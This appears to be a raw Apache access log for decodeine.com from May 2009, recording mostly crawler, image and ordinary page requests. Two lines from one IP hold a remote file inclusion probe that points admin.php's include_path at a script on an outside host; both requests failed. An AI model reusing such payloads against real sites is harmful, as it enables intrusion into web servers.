58.61.164.140 - - [22/May/2009:04:04:57 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
114.80.93.71 - - [22/May/2009:10:04:34 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.235.124.4 - - [22/May/2009:11:03:50 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [22/May/2009:11:04:06 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
66.249.71.144 - - [22/May/2009:11:05:43 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [22/May/2009:11:05:43 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 127717 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 128080
74.52.245.146 - - [22/May/2009:11:34:16 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 152 1587
193.47.80.50 - - [22/May/2009:11:58:06 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [22/May/2009:11:58:06 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
208.80.195.42 - - [22/May/2009:12:02:15 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={5FB8C435-91A7-4d3f-A959-79C43F1D298F}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 209 1587
66.249.71.144 - - [22/May/2009:13:06:05 +0100] "GET /webalizer/usage_200707.html HTTP/1.1" 200 150873 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 151237
66.249.71.144 - - [22/May/2009:13:13:21 +0100] "GET /log/ HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 235 3456
81.130.32.112 - - [22/May/2009:13:33:26 +0100] "GET / HTTP/1.0" 200 1266 "5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 208 1587
74.6.17.154 - - [22/May/2009:19:56:26 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [22/May/2009:19:56:27 +0100] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 457 216
208.87.241.135 - - [22/May/2009:21:42:51 +0100] "GET / HTTP/1.1" 200 1266 "http://www.chimehost.com" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 231 1625
124.115.0.23 - - [23/May/2009:01:52:00 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
86.169.208.196 - - [23/May/2009:02:41:08 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.co.uk/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=71&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Disometric%2Bzaha%26ndsp%3D20%26hl%3Den%26client%3Dfirefox-a%26channel%3Ds%26rls%3Dorg.mozilla:en-US:official%26sa%3DN%26start%3D60%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 790 735584
86.169.208.196 - - [23/May/2009:02:41:10 +0100] "GET /o6.jpg HTTP/1.1" 200 70616 "http://images.google.co.uk/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=71&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Disometric%2Bzaha%26ndsp%3D20%26hl%3Den%26client%3Dfirefox-a%26channel%3Ds%26rls%3Dorg.mozilla:en-US:official%26sa%3DN%26start%3D60%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 787 70980
86.169.208.196 - - [23/May/2009:02:41:16 +0100] "GET /dec4b.swf HTTP/1.1" 206 7179383 "http://images.google.co.uk/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=71&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Disometric%2Bzaha%26ndsp%3D20%26hl%3Den%26client%3Dfirefox-a%26channel%3Ds%26rls%3Dorg.mozilla:en-US:official%26sa%3DN%26start%3D60%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 852 7179825
86.169.208.196 - - [23/May/2009:02:41:58 +0100] "GET /o1.jpg HTTP/1.1" 200 258267 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 258630
86.169.208.196 - - [23/May/2009:02:42:00 +0100] "GET /o2.jpg HTTP/1.1" 200 216322 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 216685
86.169.208.196 - - [23/May/2009:02:42:03 +0100] "GET /o3.jpg HTTP/1.1" 200 153363 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 153726
86.169.208.196 - - [23/May/2009:02:42:05 +0100] "GET /o4.jpg HTTP/1.1" 200 34271 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 34632
86.169.208.196 - - [23/May/2009:02:42:09 +0100] "GET /o5.jpg HTTP/1.1" 200 60308 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 60670
86.169.208.196 - - [23/May/2009:02:42:14 +0100] "GET /o7.jpg HTTP/1.1" 200 129833 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 130197
86.169.208.196 - - [23/May/2009:02:42:15 +0100] "GET /o8.jpg HTTP/1.1" 200 221331 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 221695
86.169.208.196 - - [23/May/2009:02:42:17 +0100] "GET /o9.jpg HTTP/1.1" 200 142448 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 388 142812
86.169.208.196 - - [23/May/2009:02:42:19 +0100] "GET /o10.jpg HTTP/1.1" 200 59922 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 389 60284
86.169.208.196 - - [23/May/2009:02:42:20 +0100] "GET /o11.jpg HTTP/1.1" 200 58591 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 389 58953
86.169.208.196 - - [23/May/2009:02:42:22 +0100] "GET /o12.jpg HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 389 637
86.169.208.196 - - [23/May/2009:02:42:29 +0100] "GET /o13.jpg HTTP/1.1" 200 76280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" 389 76642
119.63.194.131 - - [23/May/2009:03:01:27 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" 154 1587
74.6.17.154 - - [23/May/2009:04:00:45 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [23/May/2009:04:00:45 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 376 1140
216.129.119.14 - - [23/May/2009:04:16:57 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
91.205.124.11 - - [23/May/2009:05:03:50 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 344 584
91.205.124.11 - - [23/May/2009:05:03:50 +0100] "GET /feidad.html HTTP/1.1" 200 820 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 345 1121
60.176.67.206 - - [23/May/2009:05:36:41 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
74.6.17.154 - - [23/May/2009:06:10:26 +0100] "GET /log/web.log.2 HTTP/1.0" 200 5490 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 378 5813
66.249.71.144 - - [23/May/2009:11:04:49 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [23/May/2009:11:04:49 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 129240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 129603
64.114.199.1 - - [23/May/2009:14:28:14 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 301 1625
66.249.71.144 - - [23/May/2009:17:09:47 +0100] "GET /o1.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 256
74.6.17.154 - - [23/May/2009:19:33:07 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [23/May/2009:19:33:08 +0100] "GET /log/?N=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
89.74.142.42 - - [23/May/2009:19:46:25 +0100] "GET / HTTP/1.1" 200 1266 "http://buss.darmowe-bajki.pl/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 231 1587
66.249.71.144 - - [23/May/2009:21:50:25 +0100] "GET /webalizer/usage_200507.html HTTP/1.1" 200 77340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 77702
193.47.80.50 - - [23/May/2009:22:09:09 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [23/May/2009:22:09:09 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
74.6.17.154 - - [23/May/2009:22:37:48 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [23/May/2009:22:37:49 +0100] "GET /log/web.log.1 HTTP/1.0" 200 13484 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 378 13809
66.249.71.246 - - [23/May/2009:23:21:32 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.246 - - [23/May/2009:23:21:32 +0100] "GET /log/web.log.2 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 254
124.115.0.23 - - [24/May/2009:01:34:56 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
216.129.119.14 - - [24/May/2009:07:27:29 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
64.114.199.38 - - [24/May/2009:07:33:17 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 172 1568
64.114.199.38 - - [24/May/2009:07:33:17 +0100] "GET /feidad.html HTTP/1.1" 200 820 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 183 1121
216.129.119.14 - - [24/May/2009:09:12:54 +0100] "GET /index2.html HTTP/1.0" 404 358 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 200 604
216.129.119.14 - - [24/May/2009:09:29:25 +0100] "GET /webalizer/usage_200810.html HTTP/1.0" 200 158616 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 158942
216.129.119.14 - - [24/May/2009:10:44:23 +0100] "GET /log/web.log.3 HTTP/1.0" 200 1961 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 2283
216.129.119.14 - - [24/May/2009:11:00:51 +0100] "GET /log/error.log.4 HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 204 1432
216.129.119.14 - - [24/May/2009:11:02:40 +0100] "GET /log/web.log.4 HTTP/1.0" 200 4090 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 4413
66.249.71.246 - - [24/May/2009:11:03:36 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 132546 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 132910
216.129.119.14 - - [24/May/2009:11:37:20 +0100] "GET /log/error.log.3 HTTP/1.0" 200 611 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 204 933
216.129.119.14 - - [24/May/2009:13:45:28 +0100] "GET /webalizer/usage_200703.html HTTP/1.0" 200 110824 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 111149
77.222.40.40 - - [24/May/2009:14:30:52 +0100] "GET ///admin.php?include_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 356 "-" "Mozilla/5.0" 187 602
77.222.40.40 - - [24/May/2009:14:30:52 +0100] "GET /log///admin.php?include_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 362 "-" "Mozilla/5.0" 191 608
213.175.169.250 - - [24/May/2009:16:24:18 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "http://images.google.com.lb/imgres?imgurl=http://www.decodeine.com/ob3.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__THYXJqUHiXp7HyxvZWXqUfv104E=&h=365&w=602&sz=71&hl=ar&start=448&um=1&tbnid=oGfKt73JmutM8M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dchanging%2Brooms%2Bon%2Bthe%2Bbeach%2Bwith%2Bthree%2Blinear%2Bplatforms%26ndsp%3D18%26hl%3Dar%26sa%3DN%26start%3D432%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 870 14480
213.175.169.250 - - [24/May/2009:16:24:18 +0100] "GET /ob3.jpg HTTP/1.0" 200 72499 "http://images.google.com.lb/imgres?imgurl=http://www.decodeine.com/ob3.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__THYXJqUHiXp7HyxvZWXqUfv104E=&h=365&w=602&sz=71&hl=ar&start=448&um=1&tbnid=oGfKt73JmutM8M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dchanging%2Brooms%2Bon%2Bthe%2Bbeach%2Bwith%2Bthree%2Blinear%2Bplatforms%26ndsp%3D18%26hl%3Dar%26sa%3DN%26start%3D432%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 868 72862
213.175.169.250 - - [24/May/2009:16:24:23 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "http://images.google.com.lb/imgres?imgurl=http://www.decodeine.com/ob3.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__THYXJqUHiXp7HyxvZWXqUfv104E=&h=365&w=602&sz=71&hl=ar&start=448&um=1&tbnid=oGfKt73JmutM8M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dchanging%2Brooms%2Bon%2Bthe%2Bbeach%2Bwith%2Bthree%2Blinear%2Bplatforms%26ndsp%3D18%26hl%3Dar%26sa%3DN%26start%3D432%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 870 2691832
216.129.119.14 - - [24/May/2009:17:24:34 +0100] "GET /webalizer/usage_200610.html HTTP/1.0" 200 107332 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 107657
216.129.119.14 - - [24/May/2009:17:44:38 +0100] "GET /log/web.log HTTP/1.0" 200 1135589 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 200 1135918
220.181.61.234 - - [24/May/2009:17:52:18 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
216.129.119.14 - - [24/May/2009:20:41:56 +0100] "GET /webalizer/usage_200805.html HTTP/1.0" 200 49673 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 49996
216.129.119.14 - - [24/May/2009:21:21:14 +0100] "GET /webalizer/usage_200712.html HTTP/1.0" 200 154783 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 155108
216.129.119.14 - - [24/May/2009:21:57:43 +0100] "GET /log/error.log.2 HTTP/1.0" 200 2074 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 204 2396
124.115.0.160 - - [25/May/2009:00:10:53 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.71.246 - - [25/May/2009:01:04:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.246 - - [25/May/2009:01:04:44 +0100] "GET /webalizer/usage_200804.html HTTP/1.1" 200 61230 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 61590
216.129.119.14 - - [25/May/2009:02:09:29 +0100] "GET /webalizer/usage_200808.html HTTP/1.0" 200 156834 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 157160
216.129.119.14 - - [25/May/2009:02:11:18 +0100] "GET /webalizer/usage_200607.html HTTP/1.0" 200 106726 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 107051
124.115.1.7 - - [25/May/2009:03:55:39 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [25/May/2009:04:08:53 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [25/May/2009:04:12:41 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [25/May/2009:04:13:27 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [25/May/2009:04:26:50 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [25/May/2009:04:31:26 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
83.133.125.202 - - [25/May/2009:04:47:22 +0100] "GET / HTTP/1.0" 200 1266 "-" "-" 43 1587
83.133.125.202 - - [25/May/2009:04:47:22 +0100] "GET / HTTP/1.0" 200 1266 "-" "-" 43 1587
58.61.164.140 - - [25/May/2009:04:51:47 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
114.80.93.71 - - [25/May/2009:04:52:41 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
219.148.132.221 - - [25/May/2009:05:47:47 +0100] "GET / HTTP/1.1" 200 1266 "http://www.chimehost.com" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 217 1625
216.129.119.14 - - [25/May/2009:06:26:49 +0100] "GET /log/web.log.1 HTTP/1.0" 200 13484 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 13809
216.129.119.14 - - [25/May/2009:07:39:35 +0100] "GET /webalizer/usage_200608.html HTTP/1.0" 200 103878 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 104203
216.129.119.14 - - [25/May/2009:07:58:10 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
216.129.119.14 - - [25/May/2009:08:52:47 +0100] "GET /webalizer/usage_200809.html HTTP/1.0" 200 148760 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 149085
66.249.71.246 - - [25/May/2009:09:18:22 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
66.249.71.246 - - [25/May/2009:11:04:53 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 135596 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 135960
216.129.119.14 - - [25/May/2009:11:18:50 +0100] "GET /webalizer/usage_200508.html HTTP/1.0" 200 84852 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 85176
66.249.71.246 - - [25/May/2009:14:00:02 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.71.246 - - [25/May/2009:14:00:02 +0100] "GET /hs06.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
216.129.119.14 - - [25/May/2009:14:39:53 +0100] "GET /webalizer/usage_200611.html HTTP/1.0" 200 104177 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 104502
58.61.164.207 - - [25/May/2009:15:29:45 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
216.129.119.14 - - [25/May/2009:15:34:34 +0100] "GET /webalizer/usage_200602.html HTTP/1.0" 200 108186 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 108511
89.74.142.42 - - [25/May/2009:15:56:43 +0100] "GET / HTTP/1.1" 200 1266 "http://afrika.megatorrent.info/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 238 1625
208.80.195.51 - - [25/May/2009:17:27:29 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={502234EF-EF96-476d-8B98-DA5B3139B1AE}; HbTools 4.8.2)" 190 1587
216.129.119.14 - - [25/May/2009:18:18:51 +0100] "GET /webalizer/usage_200706.html HTTP/1.0" 200 142042 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 142368
216.129.119.14 - - [25/May/2009:18:56:49 +0100] "GET /log/error.log.1 HTTP/1.0" 200 4068 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 204 4390
216.129.119.14 - - [25/May/2009:19:16:25 +0100] "GET /log/error.log.5 HTTP/1.0" 200 364 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 204 686
216.129.119.14 - - [25/May/2009:21:26:44 +0100] "GET /webalizer/usage_200903.html HTTP/1.0" 200 154792 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 155117
66.249.65.198 - - [25/May/2009:21:47:47 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.65.198 - - [25/May/2009:21:47:48 +0100] "GET /ob3.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 255
216.129.119.14 - - [25/May/2009:22:03:13 +0100] "GET /webalizer/usage_200904.html HTTP/1.0" 200 155177 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 155502
216.129.119.14 - - [25/May/2009:22:58:05 +0100] "GET /webalizer/usage_200905.html HTTP/1.0" 200 136001 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 136327
216.129.119.14 - - [25/May/2009:23:52:58 +0100] "GET /log/web.log.5 HTTP/1.0" 200 2798 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 3121
216.129.119.14 - - [26/May/2009:00:11:24 +0100] "GET /webalizer/usage_200801.html HTTP/1.0" 200 147495 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 147821
74.6.17.154 - - [26/May/2009:00:15:53 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [26/May/2009:00:15:54 +0100] "GET /log/web.log HTTP/1.0" 200 1143259 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 376 1143588
216.129.119.14 - - [26/May/2009:00:48:01 +0100] "GET /webalizer/usage_200804.html HTTP/1.0" 200 61230 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 61553
66.249.65.198 - - [26/May/2009:01:54:29 +0100] "GET /log/?C=M;O=D HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
216.129.119.14 - - [26/May/2009:03:32:20 +0100] "GET /webalizer/usage_200901.html HTTP/1.0" 200 158400 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 158726
124.115.4.194 - - [26/May/2009:03:34:17 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
